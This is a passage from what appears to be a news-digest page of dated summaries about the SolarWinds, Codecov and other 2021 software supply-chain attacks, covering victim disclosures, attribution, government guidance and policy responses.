E-commerce platform Mercari has disclosed a major data breach incident that occurred due to exposure from the Codecov supply-chain attack. The company has confirmed that tens of thousands of customer records, including financial information, were exposed to external actors due to the Codecov breach.


_______________________________________________________________________________________

(May 21, 2021)


Department of Veterans Affairs not a victim of SolarWinds hack

The Department of Veterans Affairs (VA) was not a victim of the sweeping SolarWinds hacking campaign, the department’s top cyber official told lawmakers. Paul Cunningham, chief information security officer of VA, said there was no evidence of compromise across its wide-ranging and complex networks. He told lawmakers this finding was reaffirmed in separate investigations by the CISA and the intelligence community.

Ref - Fed Scoop
 
_______________________________________________________________________________________

(May 20, 2021)


12 lessons learned from the SolarWinds breach

CRN spoke with 12 prominent C-suite executives at RSA Conference 2021 about the biggest lessons learned from one of the most infamous cyberattacks of all time. They compiled 12 major takeaways from the SolarWinds breach, from applying far greater scrutiny to technology suppliers and code used during the application development process to eliminating the use of on-premise Microsoft Active Directory.

Ref - CRN 

_______________________________________________________________________________________

(May 20, 2021)


SolarWinds attack dates back to at least January 2019

Hackers were present in SolarWinds' systems as early as January 2019, months earlier than previously reported, SolarWinds President and CEO Sudhakar Ramakrishna revealed during an appearance at the 2021 RSA Conference (RSAC). The entry point was the SolarWinds Orion software. Attackers compromised the SolarWinds system for distributing software updates and used that to spread malware to its customers.

Ref - PCMag 

_______________________________________________________________________________________

(May 19, 2021)


SentinelOne: More supply chain attacks are coming

Large-scale supply chain attacks are here to stay, according to Marco Figueroa, the principal threat researcher at SentinelOne. During an RSA Conference 2021 session, Figueroa dissected Sunburst, the malware used to compromise SolarWinds' Orion platform that led to an extensive supply chain attack on dozens of organizations.

Ref - TechTarget 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds CEO provides new details into attack and response

New details into the notorious SolarWinds nation-state attack and its fallout were provided by Sudhakar Ramakrishna, CEO of SolarWinds, during a keynote session on Day 3 of the virtual RSA Conference 2021. This included the revelation that the attackers may have accessed the system as early as January 2019 and an expression of remorse for comments made during his congressional appearance about the attack in February 2021.


_______________________________________________________________________________________

(May 19, 2021)


monday.com source code has been accessed by Codecov threat actors

monday.com has revealed it had suffered a Codecov supply-chain attack that recently impacted several organizations. During the cyberattack, threat actors accessed a read-only copy of its source code. The cyberattack occurred around January 31 2021 when cybercriminals obtained private access to hundreds of networks belonging to Codecov’s users.


_______________________________________________________________________________________

(May 19, 2021)


How CISA limited the impact of the SolarWinds attack

Soon after the specifics about the SolarWinds attack came to light, the DHS went to work to limit the damage. Among the first things it did was put the attack signatures into the EINSTEIN toolset that is used by nearly every agency. EINSTEIN was extremely useful in terms of identifying suspicious network traffic from a handful of federal civilian agencies that upon further investigation by those agencies helped identify additional victims of this campaign.


_______________________________________________________________________________________

(May 19, 2021)


Pentagon’s CMMC compliance may block a SolarWinds-style attack

The Pentagon’s Cybersecurity Maturity Model Certification (CMMC) program is designed to be one key line of defense. The program sets out five maturity models applicable to defense industrial base contractors based on the level of sensitivity of information stored in their systems. Under the program, obtaining a certification of compliance at the appropriate risk level is an allowable cost. However, the extent to which contractors may have to dig into their own pockets to obtain certification is a running concern.

Ref - FCW 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds CEO apologizes for blaming an intern

Sudhakar Ramakrishna, the former CEO of Pulse Secure who took the top job at SolarWinds, apologized for the way the company blamed an intern for using a weak password - solarwinds123 - during early testimony before congress. When asked about the password, former SolarWinds CEO Kevin Thompson said the password was a mistake that an intern made. Ramakrishna also told lawmakers that the password was from an intern’s Github account.

Ref - The Record 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds - a harbinger for a national data breach reporting law

As the SolarWinds attack exemplified, the conversation around federal data breach reporting legislation is becoming increasingly relevant. FireEye’s public disclosure of the SolarWinds attack exemplified the benefits of proactive partnerships between the government and private sector, which have been strengthened over the years by routine information sharing and other initiatives.

Ref - Duo 

_______________________________________________________________________________________


(May 18, 2021)


Government eyes new rules to tighten security against supply chain attacks

The Department for Digital, Culture, Media, and Sport (DCMS) has put out a call for views on the new rules, which may require IT service providers and managed services providers (MSPs) to undergo the same cybersecurity assessments that critical national infrastructure providers do.

Ref - ZDNet 

_______________________________________________________________________________________

(May 18, 2021)


Russian denial regarding SolarWinds hack is 'unconvincing'

Russia's denial of involvement in the SolarWinds hack is "unconvincing", the former head of GCHQ's National Cyber Security Centre has said. And Prof Ciaran Martin said there was evidence the tactics, techniques, and tools used by the hackers matched many years of SVR activity.

Ref - BBC 

_______________________________________________________________________________________

(May 18, 2021)


Russian spy chief denies SolarWinds attack

Russia's spy chief denied responsibility for the SolarWinds cyber attack but said he was "flattered" by the accusations from the U.S. and Britain that Russian foreign intelligence was behind such a sophisticated hack. Naryshkin said he did not want to accuse the U.S. of being behind the attack but quoted from documents leaked by former NSA contractor Edward Snowden to suggest that the tactics of the attack were similar to those used by U.S. and British intelligence agencies.

Ref - Reuters 

_______________________________________________________________________________________

(May 17, 2021)


Disconnect Internet for 3-5 days to evict SolarWinds hackers from the network

The newly published analysis report, AR21-134A, details resource-intensive and highly complex steps that will require disconnecting the enterprise network from the internet for three to five days. It is tailored for federal agencies that used affected versions of SolarWinds Orion and which discovered adversary activity within their environments (Category 3 agencies).


_______________________________________________________________________________________

(May 16, 2021)


SolarWinds breach exposes hybrid multi-cloud security weaknesses

Exposing severe security weaknesses in hybrid cloud, authentication, and least privileged access configurations, the high-profile SolarWinds breach laid bare just how vulnerable every business is. Enterprise leaders must see beyond the much-hyped baseline levels of identity and access management (IAM) and privileged access management (PAM) now offered by cloud providers.

Ref - VentureBeat 

_______________________________________________________________________________________

(May 14, 2021)


Supplemental direction (v4) on the implementation of CISA Emergency Directive (ED) 21-01

Agencies that have or had networks that used affected versions of SolarWinds Orion and have evidence of follow-on threat actor activity, such as binary beaconing to avsvmcloud[.]com and secondary C2 activity to a separate domain or IP address, including networks hosted by third parties on behalf of federal agencies, must comply with the applicable requirements for each network meeting respective conditions.

Ref - DHS

_______________________________________________________________________________________

(May 14, 2021)


Guidance for networks affected by the SolarWinds and Active Directory/M365 Compromise

Remediation plans for dealing with malicious compromises are necessarily unique to every organization, and success requires careful consideration. There are three phases for evicting the actor: Pre-Eviction (actions to detect and identify APT activity and prepare the network for eviction); Eviction (actions to remove the APT actor from on-premises and cloud environments); and Post-Eviction (actions to ensure eviction was successful and the network has good cyber posture).

Ref - CISA 

_______________________________________________________________________________________

(May 14, 2021)


Effective tactics to prevent supply chain attacks

Upguard recommends several strategies to have the highest chances of preventing supply chain attacks. This includes implementing Honeytokens, having a secure Privileged Access Management, and implementing a Zero Trust Architecture. In addition, it recommends identifying all potential insider threats, protecting vulnerable resources, and minimizing access to sensitive data.

Ref - Upguard 

_______________________________________________________________________________________

(May 14, 2021)


Rapid7 source code, alert data accessed in Codecov supply chain attack

Rapid7 has disclosed the compromise of customer data and partial source code due to the Codecov supply chain attack. The cybersecurity firm said it was one of the victims of the incident, in which an attacker obtained access to the Codecov Bash uploader script.

Ref - ZDNet
 
_______________________________________________________________________________________

(May 13, 2021)


Addressing SolarWinds through executive action

The Executive Order (EO) on cybersecurity is a much-needed step toward shoring up the nation’s cyber posture. On the heels of last week’s damaging ransomware attack on Colonial Pipeline, this EO is a necessary step forward. While the EO will not solve all of the security problems or prevent the next SolarWinds attack – and the truth is no single policy, government initiative, or technology will – it is a great start. 

Ref - Forbes 

_______________________________________________________________________________________

(May 13, 2021)


Third-party software may leave you vulnerable to cyberattacks

Leaders need new ways to reduce supply chain cybersecurity risks, whether they’re buying digital products and or producing them. The data showed that managers often fall prey to counterproductive and possibly dangerous mindsets that get in the way of securing supply chains and leave their companies exposed — and that they’re often taking cues from the top.

Ref - HBR 

_______________________________________________________________________________________

(May 13, 2021)


Some implicitly trusted infrastructure areas can lead to supply chain compromises

Supply chains are vast, and this is by no means a comprehensive list of potential problems. A threat modeling exercise within the organization can give a more robust view of vulnerable infrastructure that is often overlooked. Users should take a concentrated look at the implicit trust relationships that they have with vendors and open-source software used in their build or manufacturing process and they will likely find many areas where trust supersedes security.


_______________________________________________________________________________________

(May 12, 2021)


How Biden’s new executive order plans to prevent another SolarWinds attack

The Biden administration has been drafting the order over the last few months and is designed less to address an incident like the one experienced by Colonial Pipeline, a privately-owned critical infrastructure operator that is believed to have been hit by a criminal gang than it is aimed at preventing a future SolarWinds-like incident.

 
_______________________________________________________________________________________

(May 12, 2021)


Senate hearing raises questions about SolarWinds backdoors

The U.S. Department of Commerce's CISO said during a Senate committee hearing Tuesday that his agency was one of the first to identify a SolarWinds-related compromise, raising questions about when the U.S. government initially detected the supply chain attacks.

 
_______________________________________________________________________________________

(May 12, 2021)


Supply chain penetration: Here’s how to protect from them

Effective protection of the supply chain means the adoption of a different mindset, one that assumes a breach will happen at some point. Because the supply chain represents a critical attack vector, an attack in this area could be a critical one, so cyber measures must be stepped up accordingly. Securing access to sensitive data and systems means organizations can reduce the risks significantly, thereby making it more difficult for attackers to achieve their end goals.


_______________________________________________________________________________________

(May 11, 2021)


Senators discuss federal cybersecurity following SolarWinds hack

Government officials say the 2020 SolarWinds cyber hack by the Russian government should have been a wake-up call. The U.S. is instead dealing with another cyber attack, this time on the largest fuel pipeline in the country. The SolarWinds and Pulse Secure VPN attacks targeted federal agencies and yet it was private sector companies that discovered them.

Ref - News10 

_______________________________________________________________________________________

(May 11, 2021)


Key challenges with modern AppSec and supply chain attacks

The OWASP API project has enumerated 10 critical API level threats that are substantially more important in the era of modern, cloud-native applications. The three key trends – microservice proliferation, application change, and porous perimeters – create an environment where attacks can flourish and where IT and security teams need to consider revisiting their application security practices and controls.

Ref - DevOps 

_______________________________________________________________________________________

(May 11, 2021)


SolarWinds CEO calls for collective action against state attacks

SolarWinds CEO Sudhakar Ramakrishna has revealed he is talking with his peers in the industry to form a consortium of like-minded, mid-market firms that could take collective action to defend themselves against nation state-backed malicious actors, such as Russia’s APT29, or Cozy Bear. Ramakrishna called for the industry to adopt a model of mutual responsibility and mutual accountability among smaller firms, noting that size alone is not an indicator of a company’s ability to protect itself from cyber attacks.


_______________________________________________________________________________________

(May 10, 2021)


Twilio, HashiCorp among Codecov supply chain hack victims

The stealth software supply chain compromise of the Codecov Bash Uploader went undetected since January. The first company to publicly acknowledge exposure was HashiCorp when a post-breach investigation found a subset of its CI pipelines used the affected Codecov component. Following HashiCorp’s statement, San Francisco-based Twilio issued an advisory to confirm it used the compromised Bash Uploader component in a small number of projects and CI pipelines.


_______________________________________________________________________________________

(May 10, 2021)


All you need to know about supply chain attacks and cloud-native

There are several characteristics of cloud-native application development environments that make them a lucrative target for attackers looking to embed malicious code into the supply chain. Cloud-native application development is characterized by the widespread use of open source components, often obtained from public registries. Additionally, container images, functions, and packages are updated frequently using CI/CD pipelines, creating multiple opportunities for attackers to embed themselves into the process.

Ref - TheNewStack 

_______________________________________________________________________________________

(May 10, 2021)


Cisco Threat Explainer: Supply Chain Attacks

There is a general pattern in supply chain attacks. First, the bad actors gather what information they can find about the primary target. Next, the bad actors attempt to compromise the secondary target. Once in, the attackers move laterally, their objective often being to compromise the secondary target’s software build system, where the source code for their software is stored, updated, and compiled.

Ref - Cisco 

_______________________________________________________________________________________

(May 10, 2021)


NIST and CISA release guidelines for defense against software supply chain attacks

The CISA and the NIST have released new guidelines on defending against various software supply chain risks. The agencies listed update hijacking, tampering with code signing, and the compromise of open-source code as the popular methods used by hackers to compromise software. Threat actors hijack update channels, like in the Russian NotPetya attack on Ukraine via tax accounting software. The SolarWinds Orion software supply chain attack employed similar tactics.

Ref - CPO Magazine 

_______________________________________________________________________________________

(May 10, 2021)


Ransomware attack on CaptureRx exposes multiple providers across the U.S.

Multiple healthcare providers across the United States are reporting being impacted by a ransomware attack on CaptureRx, a San Antonio-based company providing drug-related administrative services. The CaptureRx attack highlights the impact of the software supply chain, and Faxton St. Luke’s Healthcare in New York, Randolph, VT-based Gifford Health Care, and Thrifty Drug Stores are just a few of the victims.

Ref - ZDNet 

_______________________________________________________________________________________

(May 10, 2021)


The Colonial Pipeline ransomware attack and the SolarWinds hack were all but inevitable

Software supply chains and private sector infrastructure companies are vulnerable to hackers. Many U.S. companies outsource software development because of a talent shortage, and some of that outsourcing goes to companies in Eastern Europe that are vulnerable to Russian operatives.

Ref - Yahoo 

_______________________________________________________________________________________

(May 10, 2021)


SolarWinds shares more information on cyberattack impact, initial access vector

Texas-based IT management company SolarWinds shared more information on the impact of the significant breach disclosed late last year, and claimed that less than 100 of its customers were actually hacked. The company said the attacker only targeted its build system for the Orion product, but did not actually modify any source code repository, and the SUNBURST malware has not been found in any other product.


_______________________________________________________________________________________

(May 8, 2021)


Best practices to reduce supply chain cyber exposure

Cyber-attacks against the supply chain continue to grow — and some are simply impossible to eliminate. With that in mind, consider an approach rooted in cyber risk management. Whereas a traditional cybersecurity approach focuses primarily on mitigation, cyber risk management understands that not all risks can be removed and not all attacks can be prevented, especially when it comes to the supply chain.

Ref - Marsh
 
_______________________________________________________________________________________

(May 8, 2021)


SolarWinds says Russian Group likely took data during the cyberattack

While SolarWinds doesn’t know how the Russia-backed group broke into its networks, the company believes the hackers may have used an unknown vulnerability, a brute-force cyber attack, or through social engineering -- such as a phishing operation. The hackers then conducted “research and surveillance” on the company, including its Microsoft Office 365 environment, for at least nine months prior to October 2019, when they moved to the “test run” phase of the attack.

Ref - Bloomberg 

_______________________________________________________________________________________

(May 8, 2021)


SolarWinds says Russian group likely took data during cyber-attack

The Russia-linked hackers that compromised popular software by the Texas-based firm SolarWinds last year broke into email accounts and likely took data from the firm. SolarWinds said it found evidence that causes us to believe the threat actor exfiltrated certain information as part of its research and surveillance.


_______________________________________________________________________________________

(May 7, 2021)


Hackers accessed SolarWinds’ Office 365 since early 2019

Hackers persistently accessed SolarWinds’ internal systems, Microsoft Office 365 environment, and software development environment for months before carrying out their vicious cyberattack. Hackers compromised SolarWinds’ credentials and conducted research and surveillance via persistent access for at least nine months prior to their October 2019 trial run.
Ref - CRN 

_______________________________________________________________________________________

(May 7, 2021)


US-UK Government warns about SolarWinds attackers adding a new tool to its arsenal

Agencies in the U.S. and the U.K. published a joint report providing more details on the activities of the Russian cyberspy group that is believed to be behind the attack on IT management company SolarWinds. The report reveals that the hackers started using the open-source adversary simulation framework Sliver after some of their operations were exposed.

Ref - SecurityWeek 

_______________________________________________________________________________________

(May 7, 2021)


An investigative update of the cyberattack

SolarWinds has revealed that it has found evidence that the threat actor exfiltrated certain information as part of its research and surveillance. The threat actor created and moved files that contained source code for both Orion Platform software and non-Orion products. The threat actor created and moved additional files, including a file that may have contained data supporting SolarWinds’ customer portal application. The threat actor accessed email accounts of certain personnel, and also moved files to a jump server, which was possibly intended to facilitate exfiltration of the files out of the environment.

Ref - SolarWinds 

_______________________________________________________________________________________

(May 7, 2021)


FBI, NSA, CISA & NCSC Issue Joint Advisory on Russian SVR Activity

Government agencies from the United States and the United Kingdom have teamed up to issue a new joint advisory detailing TTPss of Russia's Foreign Intelligence Service (SVR) after the group was publicly attributed to the SolarWinds supply chain attack. Agencies provided more details on SVR activity, including the exploitation that followed the SolarWinds Orion software compromise.


_______________________________________________________________________________________

(May 7, 2021)


Ransomware, supply chain attacks show no sign of abating

Ransomware and supply chain attacks are two of the most common attack vectors that offer high returns for threat actors. In the aftermath of the SolarWinds attack that had affected prominent companies like Microsoft, the panelists noted that more supply chain attacks have been enabled by the growing dependencies between systems that have become more interconnected than ever.


_______________________________________________________________________________________

(May 7, 2021)


Further TTPs associated with SVR cyber actors

Organizations are advised to follow the mitigation advice and guidance below, as well as the detection rules in the appendix to help protect against this activity. Organizations should also follow the advice and guidance in the recently published NSA advisory and the FBI and CISA alert, which detail further TTPs linked to SVR cyber actors.


_______________________________________________________________________________________

(May 6, 2021)


Following SolarWinds hack, US spy agencies review software suppliers' ties to Russia

U.S. intelligence agencies have begun a review of supply chain risks emanating from Russia in light of the far-reaching hacking campaign that exploited software made by SolarWinds and other vendors. The review will focus on any supply chain vulnerabilities stemming from Russian companies, or the U.S. companies that do business in Russia.

Ref - CyberScoop 

_______________________________________________________________________________________

(May 5, 2021)


Twilio discloses breach caused by Codecov supply chain hack

Twilio posted a blog disclosing that a small number of customer emails had likely been exfiltrated by an unknown attacker who cloned Twilio's code repositories on GitHub in mid-April. The company further connected the activity to the Codecov breach disclosed last month.

Ref - TechTarget 

_______________________________________________________________________________________

(May 3, 2021)


New Hampshire pushes pause on creating supply chain authority

To reduce cybersecurity risks, a New Hampshire lawmaker has proposed legislation to create an Information Technology Supply Chain Risk Authority to oversee all purchases and acquisitions of software, hardware, and telecommunication services used within state agencies.

Ref - GovTech

_______________________________________________________________________________________

(May 3, 2021)


Stopping the next SolarWinds requires doing something different

The SolarWinds breach is not the first major supply chain breach, but previous similar breaches failed to prompt effective regulatory action. The SolarWinds breach came in via a trusted vendor, which means even the most diligent cyber hygiene and immediate patching would not have helped. Likewise, information sharing is important, but it took nine months to detect the SolarWinds attack — so by the time there was information to share, it was too late.

Ref - DarkReading 

_______________________________________________________________________________________

(May 3, 2021)


Key indicators that the supply chain vendor has been breached

If a vendor does not provide clear and substantial responses to risk assessments, they could be concealing gaping holes in their information security program. If a vendor's website or mobile app is behaving suspiciously, a cyberattack could be taking place. If system tracking can monitor network activity between internal resources and vendors, establish a baseline for normal interaction and keep an eye out for login attempts outside of normal hours.

Ref - Upguard 

_______________________________________________________________________________________

(May 1, 2021)


More US agencies potentially hacked, this time with Pulse Secure exploits

At least five US federal agencies may have experienced cyberattacks that targeted recently discovered security flaws that give hackers free rein over vulnerable networks, the US CISA said. The zero-day vulnerability, tracked as CVE-2021-22893, was under active exploitation.
Ref - ARS Technica 

______________________________________________________________________________________

(April 30, 2021)


Key questions to consider to help mitigate against supply chain attacks

With the recent SolarWinds SunBurst exploit, many security professionals are reassessing standard threat models and national cyber-defense strategies. How can organizations and system owners increase trust while still maintaining their own IT systems now? Enterprises can begin by rethinking their definition of access control, developing a patch management strategy that promotes research and testing, and monitoring their network for malicious behavior in collaboration with cyber threat intelligence.


_______________________________________________________________________________________

(April 30, 2021)


A tale of two hacks: from SolarWinds to Microsoft Exchange

The past four months have exposed two high-profile attacks, which both had pundits declaring them the “worst-ever” and “unprecedented.” They shared other similarities – both attacked businesses rather than individuals and affected tens of thousands of organizations. Both hacks involved nation-states. And in either case, no affected organization could be fully certain of finding and evicting any adversary.

Ref - ThreatPost 

_______________________________________________________________________________________

(April 29, 2021)


Finding the weakest link in the supply chain

An organization's cybersecurity defenses are only as strong as its weakest link. Successful supply chain attacks are considered especially dangerous because of their high potential for widespread contagion. With just one successful breach of a single vendor component, hackers could gain access to all of the organizations that make use of that vendor's supply chain.

Ref - Forbes 

_______________________________________________________________________________________

(April 29, 2021)


A new PHP composer bug could enable widespread supply-chain attacks

The maintainers of Composer, a package manager for PHP, have shipped an update to address a critical vulnerability that could have allowed an attacker to execute arbitrary commands and "backdoor every PHP package," resulting in a supply-chain attack. Tracked as CVE-2021-29472, the security issue was discovered and reported on April 22 by researchers from SonarSource, following which a hotfix was deployed less than 12 hours later.


_______________________________________________________________________________________

(April 29, 2021)


Biden preparing cybersecurity executive order in response to SolarWinds attack

President Biden is preparing a cybersecurity executive order focused on helping the country protect itself from future cyberattacks following the sophisticated SolarWinds hack that was discovered in December. The order, as it is written now, includes a spate of requirements that companies who conduct business with the government will be instructed to follow.

Ref - The Hill 

_______________________________________________________________________________________

(April 28, 2021)


Minimizing the risk of supply chain attacks – best practice guidelines

Sophos provides several recommendations to minimize the risk of supply chain attacks. It recommends switching from a reactive to a proactive approach to cybersecurity, monitor for early signs of compromise, audit the supply chain, assess the security posture of all suppliers and business partners, and have a constant review of IT security operation hygiene.

Ref - Sophos 

_______________________________________________________________________________________

(April 28, 2021)


Lawmakers want to create a reserve corps to respond to the next SolarWinds

A bipartisan group of lawmakers wants to create a National Guard-like program to address growing cybersecurity vulnerabilities faced by the U.S. government. Legislation introduced today would pilot two separate reserves of trained cybersecurity professionals for the Department of Homeland Security and the Defense Department.


_______________________________________________________________________________________

(April 28, 2021)


CISA issues guidance on defending against software supply chain attacks

The CISA has issued guidance following the compromise of the SolarWinds software that affected thousands of entities across the US and beyond. The guidance took the form of a primer for companies, explaining the nature of the software supply chain and the various access points where supply chain vulnerabilities exist. It concludes with concrete recommendations for both vendors and their customers with a discussion on the Secure Software Development Framework (SSDF) and Cyber Supply Chain Risk Management (C-SCRM).


 _______________________________________________________________________________________

(April 28, 2021)


5 ways to protect software supply-chains from malicious attackers

Users can protect their organization against supply-chain attackers by avoiding the use of third-party modules; checking for threats when using modules created by unknown authors; performing automated scans of code submitted in repositories; having a plan made for external services; and creating an on-premises and cloud strategy.

Ref - Radware

_______________________________________________________________________________________

(April 27, 2021)


Another SolarWinds lesson: hackers are targeting Microsoft authentication servers

During SolarWinds, hackers directly targeted the AD FS servers to obtain certifications. Mandiant’s new attack does not require direct access to the AD FS server. Rather, hackers would spoof one AD FS server communicating with another to obtain its keys. This is not trivial, as it still requires credentials from an extremely privileged account to pull off. But given the capacity of the hackers involved in SolarWinds, chief information security officers should begin to see these kinds of attacks as part of the threat landscape.

Ref - SC Magazine 

_______________________________________________________________________________________

(April 27, 2021)


Software supply chain may get you by exploiting Open-Source libraries

Nearly all software programs developed today contain open-source components. Unfortunately, open-source packages have the same challenges as any other software (i.e. they contain security bugs). Worse, once included in an application they can become rapidly out of date, lacking the most recent bug fixes. On top of that, open-source code is freely available to everyone, so bad actors can study and experiment with it without fear of exposing their next wave of attacks.


_______________________________________________________________________________________

(April 27, 2021)


Defending against software supply chain attacks

The consequences of a software supply chain attack can be severe. First, threat actors use the compromised software vendor to gain privileged and persistent access to a victim network. By compromising a software vendor, they bypass perimeter security measures like border routers, firewalls, etc., and gain initial access. If a threat actor loses network access, they may re-enter a network using the compromised software vendor.

Ref - CISA 

_______________________________________________________________________________________

(April 27, 2021)


DFS report identifies key cybersecurity measures to reduce supply chain risk

The New York State Department of Financial Services (DFS) released a report on the Department’s investigation of the New York’s financial services industry’s response to the supply chain attack of the IT company SolarWinds. During the SolarWinds Attack, hackers corrupted routine software updates that were downloaded onto thousands of organizations’ information systems. 


_______________________________________________________________________________________

(April 26, 2021)


SolarWinds, Microsoft hacks prompt focus on Zero-Trust security

Analysis of the breaches, which exploited vulnerabilities in software from SolarWinds Corp. and Microsoft Corp., from the CISA, the NSA, and the FBI found that the hackers were often able to gain broad systems access. In many cases, the hackers moved through networks unfettered to set up back doors and administrator accounts. To prevent such attacks, zero-trust models should be more widely adopted by the public and private sectors.


_______________________________________________________________________________________

(April 26, 2021)


CISA and NIST release new interagency resource to defend against supply chain attacks

To help software vendors and customers defend against these attacks, CISA and the NIST have released Defending Against Software Supply Chain Attacks. This new interagency resource provides an overview of software supply chain risks and recommendations. The publication also provides guidance on using NIST’s Cyber Supply Chain Risk Management (C-SCRM) framework and the Secure Software Development Framework (SSDF) to identify, assess, and mitigate risks.

Ref - CERT-CISA 

_______________________________________________________________________________________

(April 26, 2021)


Another top VPN is reportedly being used to spread SolarWinds hack

Threat actors used the Pulse Secure VPN appliance to install the Supernova webshell in a victim’s SolarWinds Orion server and collect user credentials without permission, a new warning has said. This appears to be the first observed instance of a threat actor injecting the Supernova webshell directly into a victim’s SolarWinds installation.

Ref - TechRadar 

_______________________________________________________________________________________

(April 25, 2021)


Stopping SolarWinds’ style mega hacks, but preserving democracy

The SolarWinds and Shirbit hacks announced last December, along with a variety of other major cyberattacks, have convinced the US and Israeli governments that leaps forward are needed to keep up with the new frenetic pace of digital warfare. And taking countermeasures involves several challenges. One of the challenges is that the NSA is more limited by law from counter-hacking a US computer already hacked by a foreign adversary than it is going against foreign computers.


_______________________________________________________________________________________

(April 24, 2021)


HashiCorp is the latest victim of the Codecov supply-chain attack

Open-source software tools and Vault maker HashiCorp has disclosed a security incident that occurred due to the recent Codecov attack. HashiCorp, a Codecov customer, has stated that the recent Codecov supply-chain attack aimed at collecting developer credentials led to the exposure of HashiCorp's GPG signing key.


_______________________________________________________________________________________

(April 23, 2021)


Senators introduce legislation to protect critical infrastructure against attack

Sens. Maggie Hassan (D-N.H.) and Ben Sasse (R-Neb.) on Friday introduced legislation intended to protect critical infrastructure from cyberattacks and other national security threats. The National Risk Management Act would require the CISA to conduct a five-year national risk management cycle.
 
Ref - The Hill 

_______________________________________________________________________________________

(April 23, 2021)


Passwordstate password manager hacked in a supply chain attack

Click Studios, the company behind the Passwordstate enterprise password manager, notified its customers that attackers compromised the app's update mechanism to deliver malware in a supply-chain attack after breaching its networks. Malicious upgrades leading to the supply chain compromise were potentially downloaded by customers between April 20 and April 22.


_______________________________________________________________________________________

(April 23, 2021)


Supply chain attack risk looms over three million mobile app users of CocoaPods

A remote code execution (RCE) vulnerability in the central CocoaPods server could have potentially impacted up to three million mobile apps that relied on the open-source package manager. CocoaPods maintainer Orta Therox likened the potential impact of the flaw to that caused by XcodeGhost, a counterfeit version of macOS development environment Xcode.

Ref - PortSwigger 

_______________________________________________________________________________________

(April 23, 2021)


The new analysis uncovers extensive SolarWinds attack infrastructure

Cybersecurity researchers that have been tracking the infrastructure footprint of SolarWinds threat actors claim the network of servers used in the attack is "significantly larger than previously identified". RiskIQ has identified an additional 18 command and control (C&C) servers that communicated with the malicious payloads that were dropped as part of the cyberattack.

Ref - TechRadar 

_______________________________________________________________________________________

(April 22, 2021)


SUPERNOVA redux, with a portion of masquerading

The SolarWinds attack has a few interesting traits. The first is that the adversary is using residential IP addresses based in the US to make them appear as US-based employees and then leveraging valid accounts to gain access via the VPN. From there, the adversary used a VM and obfuscated PowerShell scripts to move laterally to the SolarWinds server. At this point, the SUPERNOVA webshell is installed. 

Ref - Splunk 

_______________________________________________________________________________________

(April 22, 2021)


CISA identifies Supernova malware during incident response

CISA has revealed that the SolarWinds attackers connected to the entity’s network via a Pulse Secure virtual private network (VPN) appliance, moved laterally to its SolarWinds Orion server, installed malware referred to by security researchers as SUPERNOVA (a .NET webshell), and collected credentials. CISA has released a report providing TTPs observed during an incident response engagement.
Ref - CISA 

_______________________________________________________________________________________

(April 22, 2021)


SolarWinds hack analysis reveals 56% boost in command server footprint

The Sunburst/Solorigate backdoor was designed to identify, avoid, or disable different security products, with a particular focus on circumventing antivirus software developed by FireEye, CrowdStrike, Microsoft, ESET, and F-Secure in the first stage of infection. The second and third stages included custom droppers (Teardrop/Raindrop) and the deployment of additional malware alongside Cobalt Strike. Implants for persistence with components dubbed Goldmax/GoldFinder/Sibot, as well as Sunshuttle, have also been connected to these stages. 

Ref - ZDNet 

_______________________________________________________________________________________

(April 22, 2021)


Software supply chain may get you by exploiting third-party applications

Attacks targeting “zero-days,” or unpatched security bugs, in commonly used third-party applications are another example of the risks from the software supply chain. The recent attacks on the Microsoft Exchange Server are just the latest examples of this type of software supply chain attack. In this case, bugs in Exchange Server allowed attackers to read emails and install a web shell.


_______________________________________________________________________________________

(April 22, 2021)


Supernova threat actors masqueraded as remote workers to access breached network

Members of an APT group, masquerading as teleworking employees with legitimate credentials, accessed a U.S. organization's network and planted a backdoor called Supernova on its SolarWinds Orion server for conducting reconnaissance, domain mapping, and data theft. The attackers had access to the network for nearly one year, from March 2020 to February 2021, before they were discovered and blocked.

Ref - DarkReading 

_______________________________________________________________________________________

(April 21, 2021)


White House shares learnings from the SolarWinds and Microsoft Exchange server cyber incidents

Lessons learned from the recent attacks include 'integrating private sector partners at the executive and tactical levels'. It also includes involving private sector organizations in the response in order to help deliver fixes smoothly, like Microsoft's one-click tool to simplify and accelerate victims' patching and clean-up efforts, as well as sharing relevant information between firms.

Ref - ZDNet 

_______________________________________________________________________________________

(April 20, 2021)


A software supply chain may take you down via vendor compromise

Arguably the most sophisticated of the supply chain attack methods, a Vendor Compromise typically starts with a reconnaissance phase to understand which organizations use the vendor’s software, and other relevant details. Next, the bad actor attempts to gain valid vendor employee credentials via social engineering, phishing, or other more technical means. The malicious operator then attempts to laterally move to the software build environment in order to modify the source code of the application that the vendor provides to its users.


_______________________________________________________________________________________

(April 20, 2021)


The wide web of nation-state hackers attacking the US

Both the SolarWinds supply chain and Microsoft Exchange Server attacks have shown, the targets are no longer limited to federal agencies and the largest companies. Enterprises of all sizes are now at risk, whether it's ransomware or a data breach. In terms of attacks on the U.S., nation-state threat actors typically (but not always) come from the "big four": China, Russia, North Korea, and Iran.

Ref - TechTarget 

_______________________________________________________________________________________

(April 20, 2021)

Codecov supply chain attack has echoes of SolarWinds

To date, Codecov says that it has detected periodic alterations of the Bash uploader script going back as far as 31 January, which ultimately could have allowed whoever was behind the attack to export information stored in its users’ continuous integration (CI) environments. Among Codecov’s larger customers, both HPE and IBM confirmed to Reuters that they were now probing their own systems for signs of intrusion.


_______________________________________________________________________________________

(April 20, 2021)


Hundreds of networks reportedly hacked in Codecov supply-chain attack

In new reporting by Reuters, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this system breach beyond just Codecov's systems. Codecov had suffered a supply-chain attack that went undetected for over 2-months.


_______________________________________________________________________________________

(April 19, 2021)


White House stands down SolarWinds, Microsoft Exchange cyber response groups

Stepped up patching for the SolarWinds and Microsoft Exchange vulnerabilities has allowed the White House to stand down the two Unified Coordination Groups (UCGs) tasked with tackling the government's response to the cybersecurity threats. They were activated shortly after each incident was discovered.

Ref - GCN 

_______________________________________________________________________________________

(April 19, 2021)


SolarWinds backdoor was downloaded by 1/4th of Electric Utilities - US Utility Regulator

North American Electric Reliability Corp. (NERC), a non-profit regulatory authority that oversees utilities in the United States and Canada, revealed this week that about 25% of the electric utilities on the North American power grid downloaded the SolarWinds backdoor.

Ref - CPO Magazine 

_______________________________________________________________________________________

(April 19, 2021)


Positive Technologies denies involvement in SolarWinds attack

